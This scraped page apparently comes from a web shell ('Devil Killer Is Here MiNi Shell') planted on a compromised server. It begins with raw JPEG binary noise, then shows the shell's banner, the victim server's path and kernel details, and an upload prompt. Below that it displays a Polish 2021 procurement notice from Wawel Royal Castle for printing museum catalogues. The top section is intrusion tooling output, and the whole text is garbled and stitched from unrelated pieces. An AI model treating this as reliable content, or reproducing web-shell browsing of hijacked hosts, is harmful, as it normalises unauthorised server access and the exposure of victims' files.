JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210317/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210317/0001865101-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00018651 z dnia 2021-03-17</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Druk metodą offsetową, oprawa i dostawa wydawnictw książkowych dla Zamku Królewskiego na Wawelu – Państwowych Zbiorów Sztuki" </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZAMEK KRÓLEWSKI NA WAWELU - PAŃSTWOWE ZBIORY SZTUKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000276009</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wawel 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-001</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">12 422 51 55</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">12 421 51 77</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamek@wawelzamek.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wawel.krakow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Druk metodą offsetową, oprawa i dostawa wydawnictw książkowych dla Zamku Królewskiego na Wawelu – Państwowych Zbiorów Sztuki" </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8cd67308-81b5-11eb-86b1-a64936a8669f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00018651</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-03-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00008701/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Druk wydawnictw na potrzeby Zamku Królewskiego na Wawelu - Państwowych Zbiorów Sztuki</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.wawel.krakow.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie o udzieleniezamówienia prowadzone będzie przy użyciu platformy zakupowej dostępnej pod adresem:https://portal.smartpzp.pl/zamekkrolewskinawaweluIlekroć w Specyfikacji Warunków Zamówienia lub wprzepisach o zamówieniach publicznych mowa jest o stronie internetowej prowadzonego postępowanianależy przez to rozumieć także portal dostępny pod wyżej wskazanym adresem.Zmiany i wyjaśnieniatreści SWZ oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem o udzieleniezamówienia dostępne będą na Portalu: https://portal.smartpzp.pl/zamekkrolewskinawawelu</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W niniejszym postępowaniu komunikacja pomiędzy Zamawiającym a Wykonawcami odbywa się za pośrednictwem dedykowanej platformy elektronicznej ("Portalu"). 2 Portal jest dostępny pod adresem:https://portal.smartpzp.pl/zamekkrolewskinawawelu. 3 Do założenia konta wymagane jest posiadanie kwalifikowanego podpisu elektronicznego albo podpisu zaufanego lub podpisu osobistego (e-dowód).4 Wykonawca w celu złożenia oferty i prowadzenia w niniejszym postępowaniu komunikacji zZamawiającym rejestruje się na Portalu i zakłada konto działając wedle instrukcji zawartej w Rozdziale 13 Specyfikacji Warunków Zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.10.) Przyczyny odstąpienia od komunikacji elektronicznej: <span class="normal"></h3> <p class="mb-0">zamawiający wymaga przedstawienia modelu fizycznego, modelu w skali lub próbki, których nie można przekazać przy użyciu środków komunikacji elektronicznej (art. 65 ust. 1 pkt 4 ustawy)</p> <h3 class="mb-0">3.11.) Sposób nieelektronicznego składania ofert, wniosków, oświadczeń oraz innych dokumentów: <span class="normal">Przedmiotowe środki dowodowe, o których mowa w pkt 9.11 Specyfikacji Warunków Zamówienia muszą zostać przekazane Zamawiającemu w formie papierowej za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 r. – Prawo pocztowe (Dz. U. z2020 r. poz. 1041), osobiście lub za pośrednictwem posłańca na adres: Zamek Królewski na Wawelu – Państwowe Zbiory Sztuki, Kancelaria Ogólna, Wawel 8, 31-001 Kraków, do upływu terminu składaniaofert.</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zamawiający informuje, że Administratorem danychosobowych Wykonawcy jest Zamek Królewski na Wawelu – Państwowe Zbiory Sztuki, adres: Wawel 5,31-011 Kraków, telefon: 12 422 51 55, fax: (12) 421 51 77, NIP: 6750004459; REGON: 000276009 email:zamek@wawelzamek.pl, adres strony internetowej: www.wawel.krakow.pl2 W sprawach związanych z przetwarzaniem danych osobowych, można kontaktować się z Inspektorem Ochrony Danych, za pośrednictwem adresu e mail: iod@wawelzamek.pl.3 Dane osobowe będą przetwarzane w celu przeprowadzenia postępowania o udzielenie zamówienia publicznego oraz w celu archiwizacji.4Podstawę prawną przetwarzania danych osobowych stanowi ustawa Prawo zamówień publicznych,wydane na jej podstawie akty wykonawcze, a także ustawa o narodowym zasobie archiwalnym iarchiwach.5 Dane osobowe będą ujawniane wykonawcom oraz wszystkim zainteresowanym zuwzględnieniem przepisów w zakresie zamówień publicznych, a także podmiotom przetwarzającymdane na podstawie zawartych umów.6 Dane osobowe Wykonawcy będą przechowywane przez okresobowiązywania umowy a następnie 5 lat, albo 15 lat w przypadku zamówień współfinansowanych ześrodków UE, począwszy od 1 stycznia roku kalendarzowego następującego po zakończeniu okresuobowiązywania umowy. Okresy te dotyczą również Wykonawców, którzy złożyli oferty i nie zostały oneuznane, jako najkorzystniejsze (nie zawarto z tymi Wykonawcami umowy).7 Osobie, której danedotyczą przysługuje prawo:- dostępu do danych. W przypadku, gdy wykonanie obowiązku związanegoz prawem dostępu do danych wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądaćod osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanieżądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówieniapublicznego;- sprostowania danych, ich usunięcia oraz ograniczenia przetwarzania na warunkachokreślonych w przepisach Rozporządzenia Parlamentu i Rady (UE) 2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawieswobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE. Żądanie sprostowania lubuzupełnienia danych nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia anizmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z przepisamiUstawy Prawo zamówień publicznych. Wystąpienie z żądaniem ograniczenia przetwarzania, nieogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzieleniezamówienia publicznego;- wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych.8Podanie danych jest dobrowolne, jednakże ich niepodanie może uniemożliwić Zamawiającemudokonanie oceny spełniania warunków udziału w postępowaniu oraz zdolności wykonawcy donależytego wykonania zamówienia, co skutkować może wykluczeniem wykonawcy z postępowania lubodrzuceniem jego oferty.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Skorzystanie przez osobę, której dane osobowe dotyczą, zuprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 Rozporządzenia Parlamentu iRady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku zprzetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchyleniadyrektywy 95/46/WE nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia anizmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z przepisamiUstawy Prawo zamówień publicznych. Wystąpienie z żądaniem ograniczenia przetwarzania, nieogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzieleniezamówienia publicznego;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZP-282-4/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający żąda określonej etykiety lub wskazuje mające zastosowanie wymagania określonej etykiety, zgodnie z art. 104 ustaw - etykiety środowiskowej (tzw. Ekoetykieta)</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest druk metodą offsetową, oprawa i dostawa (wraz z wniesieniem)dla Zamku Królewskiego na Wawelu – Państwowych Zbiorów Sztuki wydawnictw książkowych:1.Katalog zbiorów „Malarstwo polskie”, ISBN:978-83-66648-24-1:Nakład: 500 szt., oprawa miękkazakrywająca ze skrzydełkami, szyto-klejona, blok książki (szer./wys.): 225/265 mm (po obcięciu),500 s., ARCTIC VOLUME WHITE 130 g/m2lub równoważny, 5+5 okładka: karton biały 330g/m2, 2 skrzydełka po 160 mm wystające minimalnie poza blok; kolor 5+0, folia mat, lakier UVwybiórczo, planowany miesiąc druku: maj;2. Katalog zbiorów „Malarstwo niderlandzkie iflamandzkie”, ISBN:978-83-66648-25-8Nakład: 1 000 szt., oprawa miękka zakrywająca zeskrzydełkami, szyto-klejona, blok książki (szer./wys.): 225/265 mm (po obcięciu), 304 s.,ARCTIC VOLUME WHITE 130 g/m2lub równoważny, 4+4, okładka: karton biały 330 g/m2, 2skrzydełka po 160 mm wystające minimalnie poza blok; kolor 4+0, folia mat, lakier UVwybiórczo, planowany miesiąc druku: kwiecień/maj3. Katalog zbiorów „Arrasy Króla ZygmuntaAugusta” t. II (wersja EN), ISBN:978-83-66648-26-5Nakład: 1 000, oprawa miękka zakrywającaze skrzydełkami, szyto-klejona, blok książki(szer./wys.): 225/265 mm (po obcięciu), s. 750, plus7 wkładek w formacie 350/265 mm (wkładki zszyte z blokiem, umieszczone w różnych miejscachksiążki, rant wkładek cofnięty w stosunku do bloku), kreda mat 130 g/m2, 4+4, okładka: kartonbiały 330 g/m2, 2 skrzydełka po 160 mm wystające minimalnie poza blok; kolor 4+0, folia mat,lakier UV wybiórczo, planowany miesiąc druku: czerwiec.4. Katalog wystawy „Wilkoń”,ISBN:978-83-66648-27-2Nakład: 500 szt., oprawa twarda szyto-klejona (tektura 2,5 mm), format książki woprawie (szer./wys.): 240/283 mm, blok książki: 160 s., ARCTIC VOLUME IVORY 150 g/m2 lubrównoważny, 4+4, kapitałka kolor, wyklejka: papier barwiony w masie 120 g/m2, typu Pop'set lubrównoważny 1+0, oklejka: kreda mat 130 g/m2, 4+0, folia soft-touch, tłoczenie złotą folią (1/8pierwszej strony okładki), planowany miesiąc druku: maj5. Książka pamiątkowa „Rośliny warrasach”, ISBN:978-83-66648-28-9Nakład: 1 000 szt., oprawa miękka zakrywająca zeskrzydełkami, szyto-klejona, blok książki(szer./wys.): 165 /190 mm, 80 s., ARCTIC VOLUMEWHITE 130 g/m2lub równoważny, 4+4, okładka: karton biały 300 g/m2, 2 skrzydełka po 130 mmwystające minimalnie poza blok; kolor 4+0, folia mat, lakier UV wybiórczo, planowany miesiącdruku: kwiecień/maj6. Książka pamiątkowa „Zwierzęta w arrasach”, ISBN:978-83-66648-29-6Nakład: 1 000 szt., oprawa miękka zakrywająca ze skrzydełkami, szyto-klejona, blokksiążki(szer./wys.): 165 /190 mm, 80 s., ARCTIC VOLUME WHITE 130 g/m2lub równoważny,4+4, okładka: karton biały 300 g/m2, 2 skrzydełka po 130 mm wystające minimalnie poza blok;kolor 4+0, folia mat, lakier UV wybiórczo, planowany miesiąc druku: kwiecień/maj7.Publikacjadla dzieci „Historia różnych wątków”,ISBN:978-83-66648-23-4Nakład: 1 000 szt., oprawa miękkazakrywająca klejona, format książki: 280/280 mm(po obcięciu), blok książki:28 s., Munken PrintWhite 150 g/m2 lub równoważny, 5+5 (CMYK + Pantone złoty), okładka: MunkenLynx 300 g/m2,5+4(CMYK + Pantone złoty),folia matowa, planowany termin druku: kwiecień8. Broszura dowystawy „Malarstwo niderlandzkie i flamandzkie” wersja PL, ISBN:978-83-66648-30-2Nakład: 1000 szt., oprawa miękka zakrywająca szyto-klejona, blok książki(szer./wys.): 135/205 mm (poobcięciu), 48 s., ARCTIC VOLUME WHITE 130 g/m2lub równoważny, 4+4, okładka: karton biały300 g/m2, kolor 4+0, folia mat, planowany termin druku: kwiecień9. Broszura do wystawy„Malarstwo niderlandzkie i flamandzkie” wersja EN, ISBN:978-83-66648-31-9Nakład: 1 000 szt.,oprawa miękka zakrywająca szyto-klejona, blok książki(szer./wys.): 135/205 mm (po obcięciu),48 s., ARCTIC VOLUME WHITE 130 g/m2lub równoważny, 4+4, okładka: karton biały 300 g/m2,kolor 4+0, folia mat, planowany termin druku: maj/czerwiec.5.9 Przedmiot zamówienia obejmujetakże dostarczenie w ramach wynagrodzenia wydawnictw do siedziby Zamawiającego (adres:Wawel 5, 31-001 Kraków), nie później niż w terminie określonych w Rozdziale 6 niniejszejSpecyfikacji. Wydawnictwa muszą być zapakowane w opisane paczki. Opis ma zwierać: tytułpublikacji liczbę sztuk, datę. Wykonawca zapewni wyładunek przedmiotu zamówienia orazzłożenie ich w miejscu wskazanym przez Zamawiającego. Dostarczenie przedmiotu zamówieniaodbędzie się w dniu roboczym (od poniedziałku do piątku, w godzinach: 8 - 16). Wykonawcaponosi pełną odpowiedzialność za wszelkie uszkodzenia wydawnictw powstałe podczasrealizacji dostawy i rozładunku.Pozostałe elementy opisu przedmiotu zamówienia zawarte są wRozdziale 5 Specyfikacji Warunków Zamówienia </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79800000-2 - Usługi drukowania i powiązane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79810000-5 - Usługi drukowania</p> <p class="mb-0">79823000-9 - Usługi drukowania i dostawy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">16 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji na wydrukowane wydawnictwa</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość wydruku</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1 zdolności do występowania w obrocie gospodarczymZamawiający nie ustanawia w tymzakresie żadnych wymagań.2 uprawnień do prowadzenia określonej działalności gospodarczejlub zawodowej, o ile wynika to z odrębnych przepisówZamawiający nie ustanawia w tymzakresie żadnych wymagań.3 sytuacji ekonomicznej lub finansowej: Zamawiający nie ustanawiaw tym zakresie żadnych wymagań.4 zdolności technicznej lub zawodowej:Zamawiający uzna, żeWykonawca potwierdził spełnianie tego warunku udziału w postępowaniu, jeżeli wykaże, że wokresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy – wykonał conajmniej jedną usługę polegającą na wydrukowaniu, oprawie i dostawie wydawnictwksiążkowych o wartości co najmniej 200 000 zł brutto każda (słownie brutto złotych: dwieścietysięcy). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji oDziałalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3miesiące przed ich złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.JeżeliWykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiastdokumentu, o którym mowa w zdaniu poprzednim składa dokument lub dokumenty wystawione w kraju,w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jegolikwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu zwierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tegorodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tejprocedury. Dokumenty te powinny być wystawione nie wcześniej niż 3 miesiące przed ichzłożeniem.Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje siędokumentów, o których mowa w zdaniu poprzednim, zastępuje się je odpowiednio w całości lub wczęści dokumentem zawierającym oświadczenie Wykonawcy, ze wskazaniem osoby albo osóbuprawnionych do jego reprezentacji, złożone przed organem sądowym lub administracyjnym,notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu nasiedzibę lub miejsce zamieszkania Wykonawcy. Dokumenty te powinny być wystawione nie wcześniejniż 3 miesiące przed ich złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz usług wykonanych w okresie ostatnich 3 lat przed upływem terminuskładania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniemich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, orazzałączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami,o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz któregousługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca niejest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: 